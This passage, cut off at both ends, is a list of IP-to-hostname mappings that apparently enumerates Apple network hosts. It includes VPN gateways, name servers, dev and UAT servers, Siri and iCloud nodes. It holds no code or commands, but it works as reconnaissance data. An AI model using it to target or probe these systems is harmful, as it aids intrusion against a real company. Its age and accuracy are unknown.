eslpi5.nlven.euro.apple.com\n17.78.172.21 ilhfa1-asavpn-fw.euro.apple.com\n17.78.172.22 ilhfa1-asavpn-fw2.euro.apple.com\n17.78.197.102 ituneslive.euro.apple.com\n17.78.199.4 uklon5-asavpn-fw2.euro.apple.com\n17.78.199.5 emeia-aha-vpn.euro.apple.com\n17.78.199.195 stk-saci-vpn.euro.apple.com\n17.78.199.197 stk-saci-vpn.euro.apple.com\n17.78.231.4 nlams2-asavpn.euro.apple.com\n17.78.231.5 nlams2-asavpn-fw1.euro.apple.com\n17.80.150.11 vpn-oemcn-saci.asia.apple.com\n17.80.150.12 vpn-oemcn-saci.asia.apple.com\n17.80.150.21 oem-asa-vpn.asia.apple.com\n17.80.150.22 oem-asa-vpn.asia.apple.com\n17.80.152.10 vpn-sha-saci.asia.apple.com\n17.80.152.11 vpn-sha-saci.asia.apple.com\n17.82.200.7 mailv.asia.apple.com\n17.82.200.13 relay-xserve.asia.apple.com\n17.82.200.14 relay-xserve.asia.apple.com\n17.82.200.113 chervil.asia.apple.com\n17.82.208.11 sin-bz-asavpn1.asia.apple.com\n17.82.208.12 sin-bz-asavpn2.asia.apple.com\n17.82.242.252 sgna05a-vlan506.asia.apple.com\n17.82.254.2 nserver3.asia.apple.com\n17.82.254.3 nserver.asia.apple.com\n17.82.254.42 vpn-test.asia.apple.com\n17.82.255.4 vpn-sng-saci.asia.apple.com\n17.82.255.5 vpn-sng-saci.asia.apple.com\n17.82.255.131 sng-vpn1-ext.asia.apple.com\n17.82.255.132 sng-vpn2-ext.asia.apple.com\n17.82.255.133 sng-vpn3-ext.asia.apple.com\n17.82.255.134 webvpn.asia.apple.com\n17.82.255.135 sng-vpn4-ext.asia.apple.com\n17.82.255.138 sng-vpn7-ext.asia.apple.com\n17.83.255.11 jp-vpn.asia.apple.com\n17.83.255.12 jp-vpn.asia.apple.com\n17.83.255.130 jpn-ciscovpn-ext.asia.apple.com\n17.83.255.131 jpn-vpn1-ext.asia.apple.com\n17.83.255.132 jpn-vpn2-ext.asia.apple.com\n17.83.255.134 jpn-3vpn.asia.apple.com\n17.83.255.136 vpn-tok-saci.asia.apple.com\n17.86.254.25 listserv2.apple.com.au\n17.86.254.130 events.apple.com.au\n17.86.254.140 devfeeder.apple.com.au\n17.86.255.12 vpn-syd-saci.asia.apple.com\n17.86.255.13 vpn-syd-saci.asia.apple.com\n17.86.255.130 aus-vpn4-ext.asia.apple.com\n17.86.255.131 aus-vpn1.asia.apple.com\n17.86.255.132 vpn-syd.asia.apple.com\n17.86.255.135 aus-vpn.asia.apple.com\n17.86.255.136 syd-bz-asavpn2.asia.apple.com\n17.104.239.36 aus1-vpn-asa-1.apple.com\n17.104.239.37 aus1-vpn-asa-2.apple.com\n17.104.239.38 ivpn-aus.apple.com\n17.104.248.170 ausvr1-vpn-asa.apple.com\n17.112.87.4 egd-bz-nslbxprovisioning-uat.apple.com\n17.112.87.10 egd-bz-nslbxprovisioning.apple.com\n17.112.128.32 vpn-eg-x0.apple.com\n17.112.128.33 vpn-eg-x1.apple.com\n17.112.128.34 vpn-eg-x2.apple.com\n17.112.128.35 vpn-eg-x3.apple.com\n17.112.128.36 vpn-eg-x4.apple.com\n17.112.128.37 vpn-eg-x5.apple.com\n17.112.129.14 egd-bz-p27-asavpn14.apple.com\n17.112.129.15 egd-bz-p27-asavpn15.apple.com\n17.112.129.28 egd-p23-vpn.apple.com\n17.112.129.37 vpn-eg-3k.apple.com\n17.112.129.38 applevpn-eg.apple.com\n17.112.129.39 avpn-eg1.apple.com\n17.112.129.249 egd-bz-p27-asavpn3.apple.com\n17.112.129.250 egd-bz-p27-asavpn4.apple.com\n17.112.129.251 egd-bz-p23-asavpn5.apple.com\n17.112.129.252 egd-bz-p23-asavpn1.apple.com\n17.112.129.253 egd-bz-p23-asavpn2.apple.com\n17.112.129.254 egd-bz-p23-asavpn.apple.com\n17.112.136.1 fwsm-gateway-vlan510.apple.com\n17.112.144.54 nserver3-old.apple.com\n17.112.144.55 nserver4-old.apple.com\n17.112.144.59 nserver4.apple.com\n17.112.144.78 saciat-vpn.apple.com\n17.112.144.79 saciat-vpn.apple.com\n17.112.144.141 verify-alt.apple.com\n17.112.144.143 fdeserver-eg.apple.com\n17.112.146.106 appledirectory-dev.apple.com\n17.112.147.49 karchive.info.apple.com\n17.112.147.100 movies01.info.apple.com\n17.112.147.101 movies02.info.apple.com\n17.112.147.112 movies03.info.apple.com\n17.112.147.113 movies04.info.apple.com\n17.112.147.130 privatediscussions.info.apple.com\n17.112.147.224 alacsvc.info.apple.com\n17.112.147.226 mexsvc.info.apple.com\n17.112.152.35 livepage.apple.com\n17.112.152.74 dev-fmdl.filemaker.com\n17.112.168.14 rsvp-at-old.apple.com\n17.112.168.29 iaprvut.apple.com\n17.112.168.36 webgdv-at.apple.com\n17.112.168.59 webgdv-m.apple.com\n17.112.168.64 webgdvtws.apple.com\n17.112.168.86 selfservice-uat.apple.com\n17.112.168.94 ireservet.apple.com\n17.112.168.112 privromewebt.apple.com\n17.112.168.128 webgdvitws.apple.com\n17.112.168.137 developert.apple.com\n17.112.168.147 developertest.apple.com\n17.112.168.187 privftpuat.apple.com\n17.112.168.196 itntrvlt-ws1.apple.com\n17.112.168.197 itntrvlt-ws2.apple.com\n17.112.168.199 itntrvlt.apple.com\n17.112.168.251 rsvp-t-old.apple.com\n17.112.169.37 reservet-cn-old.apple.com\n17.112.169.43 webgdvat01.apple.com\n17.112.169.44 webgdvat02.apple.com\n17.112.169.89 webgdv1-m.apple.com\n17.112.169.90 webgdv2-m.apple.com\n17.112.169.133 reservet-hk-old.apple.com\n17.112.169.140 iaprvext-uat-eg-old.apple.com\n17.112.169.141 iaprvext-uat3-eg-old.apple.com\n17.112.169.142 iaprvext-uat4-eg-old.apple.com\n17.112.169.167 sswsdev.apple.com\n17.112.170.156 developertest-ws1.apple.com\n17.112.170.157 developertest-ws2.apple.com\n17.112.171.86 privftpdev-old.apple.com\n17.112.224.5 privftpuat-old.apple.com\n17.128.100.139 scv1.apple.com\n17.128.113.31 scv.apple.com\n17.128.115.100 scv-postino.apple.com\n17.128.115.180 scv-postino.apple.com\n17.128.115.182 foxglove.apple.com\n17.129.100.139 scv2.apple.com\n17.129.200.139 scv3.apple.com\n17.130.4.10 mu21p01sa-vc001.siri.apple.com\n17.136.226.10 minint-dndaj1v.siri.apple.com\n17.136.226.13 minint-276rcvc.siri.apple.com\n17.136.226.20 minint-7ke1vh6.siri.apple.com\n17.136.226.21 minint-hqvggbh.siri.apple.com\n17.136.226.23 minint-sa9vk2i.siri.apple.com\n17.136.226.24 minint-515l9vi.siri.apple.com\n17.136.226.25 minint-tr1g9vg.siri.apple.com\n17.136.226.28 minint-68gvpsj.siri.apple.com\n17.136.226.31 minint-hvfhrtr.siri.apple.com\n17.139.0.10 pv11p01sa-vc001.siri.apple.com\n17.139.8.10 pv11p02sa-vc001.siri.apple.com\n17.140.24.5 pv11p01sa.apple.com\n17.140.24.7 pv11p01sa-q01.siri.apple.com\n17.140.24.10 pv11p01sa-q04.siri.apple.com\n17.140.24.11 pv11p01sa-q05.siri.apple.com\n17.140.24.13 pv11p01sa-q07.siri.apple.com\n17.140.24.130 pv11p01sa-p01.apple.com\n17.140.24.132 pv11p01sa-q13.siri.apple.com\n17.140.24.133 pv11p01sa-sailfish.siri.apple.com\n17.140.25.27 pv11p02sa-p03.siri.apple.com\n17.140.25.29 pv11p02sa-p05.siri.apple.com\n17.140.25.32 pv11p02sa-p08.siri.apple.com\n17.140.25.131 pv11p02sa-p01.siri.apple.com\n17.140.25.132 pv11p02sa-p04.siri.apple.com\n17.140.25.133 pv11p02sa-p06.siri.apple.com\n17.140.25.136 pv11p02sa-p07.siri.apple.com\n17.140.25.138 pv11p02sa-p09.siri.apple.com\n17.140.25.139 pv11p02sa-q01.siri.apple.com\n17.140.25.140 pv11p02sa-q02.siri.apple.com\n17.140.25.141 pv11p02sa-sailfish.siri.apple.com\n17.140.26.5 pv11p03sa.apple.com\n17.140.26.6 pv11p03sa-sailfish.siri.apple.com\n17.140.27.5 pv11p04sa.apple.com\n17.140.27.8 pv11p04sa-sailfish.siri.apple.com\n17.142.132.7 pv-am-red.apple.com\n17.142.132.8 pv-apple-ca.apple.com\n17.142.132.9 pv-apple-jp.apple.com\n17.142.132.10 pv-applereg.apple.com\n17.142.132.11 pv-asia-red.apple.com\n17.142.132.12 pv-documentation.apple.com\n17.142.132.13 pv-documentation-gsa.apple.com\n17.142.132.14 pv-dotmacssti.apple.com\n17.142.132.15 pv-euro-prod-red.apple.com\n17.142.132.16 pv-euro-product.apple.com\n17.142.132.17 pv-euro-red.apple.com\n17.142.132.18 pv-extensions.apple.com\n17.142.132.19 pv-files.apple.com\n17.142.132.20 pv-genserv.apple.com\n17.142.132.21 pv-help.apple.com\n17.142.132.22 pv-helposx.apple.com\n17.142.132.23 pv-helpqt.apple.com\n17.142.132.24 pv-icloudstatus.apple.com\n17.142.132.25 pv-ink.apple.com\n17.142.132.26 pv-iphone-ld.apple.com\n17.142.132.27 pv-ipod-ca.apple.com\n17.142.132.28 pv-ipod.apple.com\n17.142.132.29 pv-itunes.apple.com\n17.142.132.30 pv-itunes-asia.apple.com\n17.142.132.31 pv-itunes-euro.apple.com\n17.142.132.32 pv-itunes-ca.apple.com\n17.142.132.33 pv-itunes-com.apple.com\n17.142.132.34 pv-livepage.apple.com\n17.142.132.36 pv-mp4.apple.com\n17.142.132.37 pv-neo-qtv.apple.com\n17.142.132.38 pv-nothingreal.apple.com\n17.142.132.39 pv-productred.apple.com\n17.142.132.40 pv-prohelp.apple.com\n17.142.132.41 pv-qtannounce.apple.com\n17.142.132.42 pv-qtinstall.apple.com\n17.142.132.43 pv-qtpix.apple.com\n17.142.132.44 pv-qtsoftware.apple.com\n17.142.132.45 pv-qttest.apple.com\n17.142.132.46 pv-rebate.apple.com\n17.142.132.47 pv-redirect.apple.com\n17.142.132.48 pv-rss.itunes.apple.com\n17.142.132.49 pv-searchcgi.apple.com\n17.142.132.50 pv-shake.apple.com\n17.142.132.51 pv-ssl-apple.apple.com\n17.142.132.52 pv-stream.qtv.apple.com\n17.142.132.53 pv-supgsa.apple.com\n17.142.132.54 pv-trailers.apple.com\n17.142.132.55 pv-tunes.apple.com\n17.142.132.56 pv-wsidecar.apple.com\n17.142.132.58 pv-www.apple.com\n17.142.132.59 pv-apple-com.apple.com\n17.142.132.60 pv-trackingshipment.apple.com\n17.142.132.61 pv-captive-redirect.apple.com\n17.142.132.62 pv-itunesradio-com.apple.com\n17.142.132.250 pv-www-backup.apple.com\n17.144.120.10 nk32p01sa-vc001.siri.apple.com\n17.144.184.10 nk33p01sa-vc001.siri.apple.com\n17.146.6.10 serverstatus.apple.com\n17.147.16.21 nk21l01sa-vc001.siri.apple.com\n17.149.0.83 appletv.fr\n17.149.0.157 nwk-silverscreen01.apple.com\n17.149.64.34 iphone-services-ls-nwk.apple.com\n17.149.160.19 nwk-stream.qtv.apple.com\n17.149.160.27 livepage.apple.com\n17.149.160.48 nwk-neo.qtv.apple.com\n17.149.160.64 silverscreen.apple.com\n17.149.160.66 itunes12daysofgifts.vn\n17.149.160.86 genserv.apple.com\n17.149.182.20 printservices.apple.com\n17.149.182.21 printservices-download-origin.apple.com\n17.149.182.24 nwk-geneva-upload.apple.com\n17.149.182.25 nwk-geneva-download.apple.com\n17.149.240.71 nwk-2gactivation.apple.com\n17.149.241.232 nwk2-carrier-services.apple.com\n17.149.241.252 nwk-carrier-services.apple.com\n17.150.11.23 cnvpn.apple.com\n17.150.11.24 cnvpn.apple.com\n17.151.1.24 nwk-rover-ember01.apple.com\n17.151.1.26 nwk-rover-ember02.apple.com\n17.151.1.28 nwk-rover-ember03.apple.com\n17.151.8.12 nwk1-f19-avaya-ssg1.apple.com\n17.151.8.13 nwk1-f19-avaya-ssg2.apple.com\n17.151.20.26 volumeitunesprogramdownloadtool.apple.com\n17.151.20.51 remoteadvisor1.apple.com\n17.151.20.52 remoteadvisor2.apple.com\n17.151.20.53 remoteadvisor.apple.com\n17.151.20.147 trainingevents.apple.com\n17.151.20.171 radar-webservices.apple.com\n17.151.20.221 konaservice-ext.apple.com\n17.151.20.249 salesinventoryreporting.apple.com\n17.151.20.253 volumeitunesprogram-a.apple.com\n17.151.31.19 origin-selfsolve-bz.apple.com\n17.151.31.43 origin-helpviewer-bz.apple.com\n17.151.31.50 survey.apple.com\n17.151.31.74 origin-uq7n0f698c0e6-tmp-selfsolve.apple.com\n17.151.33.12 icalserver.apple.com\n17.151.38.84 privftp.apple.com\n17.151.47.23 iphone-reserve.apple.com\n17.151.47.25 reserve-old.apple.com\n17.151.47.31 selfsolve-new.apple.com\n17.151.47.32 jointventure.apple.com\n17.151.63.11 vpn-test1.apple.com\n17.151.63.12 vpn-test2.apple.com\n17.151.63.13 vpn-test3.apple.com\n17.151.63.14 vpn-nwk-fs.apple.com\n17.151.63.17 vpn-cup-saci.apple.com\n17.151.63.18 vpn-cup-saci.apple.com\n17.151.63.19 vpn-cup-saci.apple.com\n17.151.63.21 vpn-cup-saci.apple.com\n17.151.63.22 vpn-cup-saci.apple.com\n17.151.63.23 vpn-cup-saci.apple.com\n17.151.63.24 vpn-cup-saci.apple.com\n17.151.63.25 vpn-cup-saci.apple.com\n17.151.63.26 vpn-cup-saci.apple.com\n17.151.63.27 vpn-cup-saci.apple.com\n17.151.63.30 vpn-cup-saci.apple.com\n17.151.63.34 nwk1-bz-3p-unvpn.apple.com\n17.151.63.39 vpn-cup-saci.apple.com\n17.151.63.40 vpn-cup-saci.apple.com\n17.151.63.41 ivpn.apple.com\n17.151.63.42 vpn.apple.com\n17.151.63.43 vpn-cup-saci.apple.com\n17.151.63.44 ivpn.apple.com\n17.151.63.45 ivpn.apple.com\n17.151.63.46 vpn.apple.com\n17.151.63.57 vpn-cup-saci.apple.com\n17.151.63.58 vpn-cup-saci.apple.com\n17.151.63.59 vpn-cup-saci.apple.com\n17.151.63.71 vpn-cup-saci.apple.com\n17.151.63.72 vpn-cup-saci.apple.com\n17.151.63.81 nwk1-g10-vpn.apple.com\n17.151.63.82 nwk1-g10-vpn.apple.com\n17.151.63.83 nwk1-g10-vpn.apple.com\n17.151.63.84 nwk1-g10-vpn.apple.com\n17.151.63.85 nwk1-g10-vpn-asa5.apple.com\n17.151.63.86 nwk1-g10-vpn-asa6.apple.com\n17.151.63.87 nwk1-g10-vpn-asa7.apple.com\n17.151.63.88 nwk1-g10-vpn-asa8.apple.com\n17.151.63.101 ivpn-nwk.apple.com\n17.151.63.103 idcvpn-nwk.apple.com\n17.151.63.201 nwk1-g10-dcvpn-asa1.apple.com\n17.151.63.202 nwk1-g10-dcvpn-asa2.apple.com\n17.151.63.203 nwk1-g10-dcvpn-asa3.apple.com\n17.151.63.204 nwk-secvpn.apple.com\n17.151.63.244 nwk1-bz-f19-asaivpn.apple.com\n17.151.63.245 nwk1-bz-f19-asavpn3.apple.com\n17.151.63.246 nwk1-bz-f19-asavpn4.apple.com\n17.151.63.247 nwk1-bz-f19-3pvpn1.apple.com\n17.151.63.248 nwk1-bz-f19-3pvpn2.apple.com\n17.151.63.249 nwk1-bz-f19-3pvpn.apple.com\n17.151.63.252 nwk1-bz-f19-asavpn1.apple.com\n17.151.63.253 nwk1-bz-f19-asavpn2.apple.com\n17.151.63.254 nwk1-bz-f19-asavpn.apple.com\n17.151.64.70 vpn-cup-ccert.apple.com\n17.151.135.10 developer2.apple.com\n17.151.140.29 developerx.apple.com\n17.151.140.30 developer.apple.com\n17.151.140.33 connect2-java-temp.apple.com\n17.151.140.34 rsvp-temp.apple.com\n17.151.140.35 developerns.apple.com\n17.151.140.38 developerservices2.apple.com\n17.151.140.246 devservices.apple.com\n17.151.140.247 developerm.apple.com\n17.151.140.248 developerweb.apple.com\n17.151.140.249 developerservices1.apple.com\n17.151.194.82 livid.apple.com\n17.151.224.68 nk20310001c.connectivity.icloud.com\n17.151.224.69 nk20710001c.connectivity.icloud.com\n17.151.224.70 nk20610001c.connectivity.icloud.com\n17.151.224.71 nk20210001c.connectivity.icloud.com\n17.151.224.72 nk20410001c.connectivity.icloud.com\n17.151.224.73 nk20810001c.connectivity.icloud.com\n17.151.224.74 nk20510001c.connectivity.icloud.com\n17.151.224.75 nk20110001c.connectivity.icloud.com\n17.151.224.76 p10-conduit.connectivity.icloud.com\n17.151.224.77 nk20310002c.connectivity.icloud.com\n17.151.224.78 nk20710002c.connectivity.icloud.com\n17.151.224.79 nk20610002c.connectivity.icloud.com\n17.151.224.80 nk20210002c.connectivity.icloud.com\n17.151.224.81 nk20410002c.connectivity.icloud.com\n17.151.224.82 nk20810002c.connectivity.icloud.com\n17.151.224.83 nk20510002c.connectivity.icloud.com\n17.151.224.90 nk20110002c.connectivity.icloud.com\n17.151.224.99 nk20310003c.connectivity.icloud.com\n17.151.224.100 nk20710003c.connectivity.icloud.com\n17.151.224.101 nk20610003c.connectivity.icloud.com\n17.151.224.102 nk20210003c.connectivity.icloud.com\n17.151.224.103 nk20410003c.connectivity.icloud.com\n17.151.224.104 nk20810003c.connectivity.icloud.com\n17.151.224.105 nk20510003c.connectivity.icloud.com\n17.151.224.106 nk20110003c.connectivity.icloud.com\n17.151.224.107 nk20310004c.connectivity.icloud.com\n17.151.224.108 nk20710004c.connectivity.icloud.com\n17.151.224.109 nk20610004c.connectivity.icloud.com\n17.151.224.110 nk20210004c.connectivity.icloud.com\n17.151.224.111 nk20410004c.connectivity.icloud.com\n17.151.224.112 nk20810004c.connectivity.icloud.com\n17.151.224.113 nk20510004c.connectivity.icloud.com\n17.151.224.114 nk20110004c.connectivity.icloud.com\n17.151.225.58 p12-conduit.connectivity.icloud.com\n17.151.225.79 nk20112001c.connectivity.icloud.com\n17.151.225.80 nk20112002c.connectivity.icloud.com\n17.151.225.81 nk20112003c.connectivity.icloud.com\n17.151.225.82 nk20112004c.connectivity.icloud.com\n17.151.225.83 nk20212001c.connectivity.icloud.com\n17.151.225.84 nk20212002c.connectivity.icloud.com\n17.151.225.85 nk20212003c.connectivity.icloud.com\n17.151.225.86 nk20212004c.connectivity.icloud.com\n17.151.225.87 nk20312001c.connectivity.icloud.com\n17.151.225.88 nk20312002c.connectivity.icloud.com\n17.151.225.89 nk20312003c.connectivity.icloud.com\n17.151.225.90 nk20312004c.connectivity.icloud.com\n17.151.225.91 nk20412001c.connectivity.icloud.com\n17.151.225.92 nk20412002c.connectivity.icloud.com\n17.151.225.93 nk20412003c.connectivity.icloud.com\n17.151.225.94 nk20412004c.connectivity.icloud.com\n17.151.225.95 nk20512001c.connectivity.icloud.com\n17.151.225.96 nk20512002c.connectivity.icloud.com\n17.151.225.97 nk20512003c.connectivity.icloud.com\n17.151.225.98 nk20512004c.connectivity.icloud.com\n17.151.225.99 nk20612001c.connectivity.icloud.com\n17.151.225.100 nk20612002c.connectivity.icloud.com\n17.151.225.101 nk20612003c.connectivity.icloud.com\n17.151.225.102 nk20612004c.connectivity.icloud.com\n17.151.225.103 nk20712001c.connectivity.icloud.com\n17.151.225.104 nk20712002c.connectivity.icloud.com\n17.151.225.105 nk20712003c.connectivity.icloud.com\n17.151.225.106 nk20712004c.connectivity.icloud.com\n17.151.225.107 nk20812001c.connectivity.icloud.com\n17.151.225.108 nk20812002c.connectivity.icloud.com\n17.151.225.109 nk20812003c.connectivity.icloud.com\n17.151.225.110 nk20812004c.connectivity.icloud.com\n17.151.226.13 p14-conduit.connectivity.icloud.com\n17.151.226.35 nk20114001c.connectivity.icloud.com\n17.151.226.36 nk20114002c.connectivity.icloud.com\n17.151.226.37 nk20114003c.connectivity.icloud.com\n17.151.226.38 nk20114004c.connectivity.icloud.com\n17.151.226.39 nk20214001c.connectivity.icloud.com\n17.151.226.40 nk20214002c.connectivity.icloud.com\n17.151.226.41 nk20214003c.connectivity.icloud.com\n17.151.226.42 nk20214004c.connectivity.icloud.com\n17.151.226.43 nk20314001c.connectivity.icloud.com\n17.151.226.44 nk20314002c.connectivity.icloud.com\n17.151.226.45 nk20314003c.connectivity.icloud.com\n17.151.226.46 nk20314004c.connectivity.icloud.com\n17.151.226.47 nk20414001c.connectivity.icloud.com\n17.151.226.48 nk20414002c.connectivity.icloud.com\n17.151.226.49 nk20414003c.connectivity.icloud.com\n17.151.226.50 nk20414004c.connectivity.icloud.com\n17.151.226.51 nk20514001c.connectivity.icloud.com\n17.151.226.52 nk20514002c.connectivity.icloud.com\n17.151.226.53 nk20514003c.connectivity.icloud.com\n17.151.226.54 nk20514004c.connectivity.icloud.com\n17.151.226.55 nk20614001c.connectivity.icloud.com\n17.151.226.56 nk20614002c.connectivity.icloud.com\n17.151.226.57 nk20614003c.connectivity.icloud.com\n17.151.226.58 nk20614004c.connectivity.icloud.com\n17.151.226.59 nk20714001c.connectivity.icloud.com\n17.151.226.60 nk20714002c.connectivity.icloud.com\n17.151.226.61 nk20714003c.connectivity.icloud.com\n17.151.226.62 nk20714004c.connectivity.icloud.com\n17.151.226.63 nk20814001c.connectivity.icloud.com\n17.151.226.64 nk20814002c.connectivity.icloud.com\n17.151.226.65 nk20814003c.connectivity.icloud.com\n17.151.226.66 nk20814004c.connectivity.icloud.com\n17.151.227.47 p16-conduit.connectivity.icloud.com\n17.151.227.48 nk20116001c.connectivity.icloud.com\n17.151.227.49 nk20116002c.connectivity.icloud.com\n17.151.227.50 nk20116003c.connectivity.icloud.com\n17.151.227.51 nk20116004c.connectivity.icloud.com\n17.151.227.52 nk20216001c.connectivity.icloud.com\n17.151.227.53 nk20216002c.connectivity.icloud.com\n17.151.227.54 nk20216003c.connectivity.icloud.com\n17.151.227.55 nk20216004c.connectivity.icloud.com\n17.151.227.56 nk20316001c.connectivity.icloud.com\n17.151.227.57 nk20316002c.connectivity.icloud.com\n17.151.227.58 nk20316003c.connectivity.icloud.com\n17.151.227.59 nk20316004c.connectivity.icloud.com\n17.151.227.60 nk20416001c.connectivity.icloud.com\n17.151.227.61 nk20416002c.connectivity.icloud.com\n17.151.227.62 nk20416003c.connectivity.icloud.com\n17.151.227.63 nk20416004c.connectivity.icloud.com\n17.151.227.64 nk20516001c.connectivity.icloud.com\n17.151.227.65 nk20516002c.connectivity.icloud.com\n17.151.227.66 nk20516003c.connectivity.icloud.com\n17.151.227.67 nk20516004c.connectivity.icloud.com\n17.151.227.68 nk20616001c.connectivity.icloud.com\n17.151.227.69 nk20616002c.connectivity.icloud.com\n17.151.227.70 nk20616003c.connectivity.icloud.com\n17.151.227.71 nk20616004c.connectivity.icloud.com\n17.151.227.72 nk20716001c.connectivity.icloud.com\n17.151.227.73 nk20716002c.connectivity.icloud.com\n17.151.227.74 nk20716003c.connectivity.icloud.com\n17.151.227.75 nk20716004c.connectivity.icloud.com\n17.151.227.76 nk20816001c.connectivity.icloud.com\n17.151.227.77 nk20816002c.connectivity.icloud.com\n17.151.227.78 nk20816003c.connectivity.icloud.com\n17.151.227.79 nk20816004c.connectivity.icloud.com\n17.151.236.54 p18-conduit.connectivity.icloud.com\n17.151.236.55 nk20118001c.connectivity.icloud.com\n17.151.236.56 nk20118002c.connectivity.icloud.com\n17.151.236.57 nk20118003c.connectivity.icloud.com\n17.151.236.58 nk20118004c.connectivity.icloud.com\n17.151.236.59 nk20218001c.connectivity.icloud.com\n17.151.236.60 nk20218002c.connectivity.icloud.com\n17.151.236.61 nk20218003c.connectivity.icloud.com\n17.151.236.62 nk20218004c.connectivity.icloud.com\n17.151.236.63 nk20318001c.connectivity.icloud.com\n17.151.236.64 nk20318002c.connectivity.icloud.com\n17.151.236.65 nk20318003c.connectivity.icloud.com\n17.151.236.66 nk20318004c.connectivity.icloud.com\n17.151.236.67 nk20418001c.connectivity.icloud.com\n17.151.236.68 nk20418002c.connectivity.icloud.com\n17.151.236.69 nk20418003c.connectivity.icloud.com\n17.151.236.70 nk20418004c.connectivity.icloud.com\n17.151.236.71 nk20518001c.connectivity.icloud.com\n17.151.236.72 nk20518002c.connectivity.icloud.com\n17.151.236.73 nk20518003c.connectivity.icloud.com\n17.151.236.74 nk20518004c.connectivity.icloud.com\n17.151.236.75 nk20618001c.connectivity.icloud.com\n17.151.236.76 nk20618002c.connectivity.icloud.com\n17.151.236.77 nk20618003c.connectivity.icloud.com\n17.151.236.78 nk20618004c.connectivity.icloud.com\n17.151.236.79 nk20718001c.connectivity.icloud.com\n17.151.236.80 nk20718002c.connectivity.icloud.com\n17.151.236.81 nk20718003c.connectivity.icloud.com\n17.151.236.82 nk20718004c.connectivity.icloud.com\n17.151.236.83 nk20818001c.connectivity.icloud.com\n17.151.236.84 nk20818002c.connectivity.icloud.com\n17.151.236.85 nk20818003c.connectivity.icloud.com\n17.151.236.86 nk20818004c.connectivity.icloud.com\n17.151.237.18 p20-conduit.connectivity.icloud.com\n17.151.237.42 nk20120001c.connectivity.icloud.com\n17.151.237.43 nk20120002c.connectivity.icloud.com\n17.151.237.44 nk20120003c.connectivity.icloud.com\n17.151.237.45 nk20120004c.connectivity.icloud.com\n17.151.237.46 nk20220001c.connectivity.icloud.com\n17.151.237.47 nk20220002c.connectivity.icloud.com\n17.151.237.48 nk20220003c.connectivity.icloud.com\n17.151.237.49 nk20220004c.connectivity.icloud.com\n17.151.237.50 nk20320001c.connectivity.icloud.com\n17.151.237.51 nk20320002c.connectivity.icloud.com\n17.151.237.52 nk20320003c.connectivity.icloud.com\n17.151.237.53 nk20320004c.connectivity.icloud.com\n17.151.237.54 nk20420001c.connectivity.icloud.com\n17.151.237.55 nk20420002c.connectivity.icloud.com\n17.151.237.56 nk20420003c.connectivity.icloud.com\n17.151.237.57 nk20420004c.connectivity.icloud.com\n17.151.237.58 nk20520001c.connectivity.icloud.com\n17.151.237.59 nk20520002c.connectivity.icloud.com\n17.151.237.60 nk20520003c.connectivity.icloud.com\n17.151.237.61 nk20520004c.connectivity.icloud.com\n17.151.237.62 nk20620001c.connectivity.icloud.com\n17.151.237.63 nk20620002c.connectivity.icloud.com\n17.151.237.64 nk20620003c.connectivity.icloud.com\n17.151.237.65 nk20620004c.connectivity.icloud.com\n17.151.237.66 nk20720001c.connectivity.icloud.com\n17.151.237.67 nk20720002c.connectivity.icloud.com\n17.151.237.68 nk20720003c.connectivity.icloud.com\n17.151.237.69 nk20720004c.connectivity.icloud.com\n17.151.237.70 nk20820001c.connectivity.icloud.com\n17.151.237.71 nk20820002c.connectivity.icloud.com\n17.151.237.72 nk20820003c.connectivity.icloud.com\n17.151.237.73 nk20820004c.connectivity.icloud.com\n17.151.239.9 p22-conduit.connectivity.icloud.com\n17.151.239.10 nk20222003c.connectivity.icloud.com\n17.151.239.11 nk20222004c.connectivity.icloud.com\n17.151.239.12 nk20322001c.connectivity.icloud.com\n17.151.239.13 nk20322002c.connectivity.icloud.com\n17.151.239.14 nk20322003c.connectivity.icloud.com\n17.151.239.15 nk20322004c.connectivity.icloud.com\n17.151.239.16 nk20422001c.connectivity.icloud.com\n17.151.239.17 nk20422002c.connectivity.icloud.com\n17.151.239.18 nk20422003c.connectivity.icloud.com\n17.151.239.19 nk20422004c.connectivity.icloud.com\n17.151.239.20 nk20522001c.connectivity.icloud.com\n17.151.239.21 nk20522002c.connectivity.icloud.com\n17.151.239.22 nk20522003c.connectivity.icloud.com\n17.151.239.23 nk20522004c.connectivity.icloud.com\n17.151.239.24 nk20622001c.connectivity.icloud.com\n17.151.239.25 nk20622002c.connectivity.icloud.com\n17.151.239.26 nk20622003c.connectivity.icloud.com\n17.151.239.27 nk20622004c.connectivity.icloud.com\n17.151.239.28 nk20722001c.connectivity.icloud.com\n17.151.239.29 nk20722002c.connectivity.icloud.com\n17.151.239.30 nk20722003c.connectivity.icloud.com\n17.151.239.31 nk20722004c.connectivity.icloud.com\n17.151.239.32 nk20822001c.connectivity.icloud.com\n17.151.239.33 nk20822002c.connectivity.icloud.com\n17.151.239.34 nk20822003c.connectivity.icloud.com\n17.151.239.35 nk20822004c.connectivity.icloud.com\n17.151.239.36 nk20122001c.connectivity.icloud.com\n17.151.239.37 nk20122002c.connectivity.icloud.com\n17.151.239.38 nk20122003c.connectivity.icloud.com\n17.151.239.39 nk20122004c.connectivity.icloud.com\n17.151.239.40 nk20222001c.connectivity.icloud.com\n17.151.239.41 nk20222002c.connectivity.icloud.com\n17.152.249.51 vgr101.apple.com\n17.152.249.52 vgr102.apple.com\n17.152.249.53 vgr103.apple.com\n17.152.249.54 vgr104.apple.com\n17.152.249.55 vgr105.apple.com\n17.152.249.56 vgr106.apple.com\n17.152.249.57 vgr107.apple.com\n17.152.249.58 vgr108.apple.com\n17.152.249.73 rvgr1.apple.com\n17.152.249.74 rvgr2.apple.com\n17.152.249.85 xvgr1.apple.com\n17.152.249.86 xvgr2.apple.com\n17.154.8.11 r1s1i1.connectivity.me.com\n17.154.8.12 r1s1i2.connectivity.me.com\n17.154.8.13 r1s1i3.connectivity.me.com\n17.154.8.14 r1s1i4.connectivity.me.com\n17.154.8.15 r1s1i5.connectivity.me.com\n17.154.8.16 r1s1i6.connectivity.me.com\n17.154.8.17 r1s1i7.connectivity.me.com\n17.154.8.18 r1s1i8.connectivity.me.com\n17.154.8.19 r1s2i1.connectivity.me.com\n17.154.8.20 r1s2i2.connectivity.me.com\n17.154.8.21 r1s2i3.connectivity.me.com\n17.154.8.22 r1s2i4.connectivity.me.com\n17.154.8.23 r1s2i5.connectivity.me.com\n17.154.8.24 r1s2i6.connectivity.me.com\n17.154.8.25 r1s2i7.connectivity.me.com\n17.154.8.26 r1s2i8.connectivity.me.com\n17.154.8.27 r1s3i1.connectivity.me.com\n17.154.8.28 r1s3i2.connectivity.me.com\n17.154.8.29 r1s3i3.connectivity.me.com\n17.154.8.30 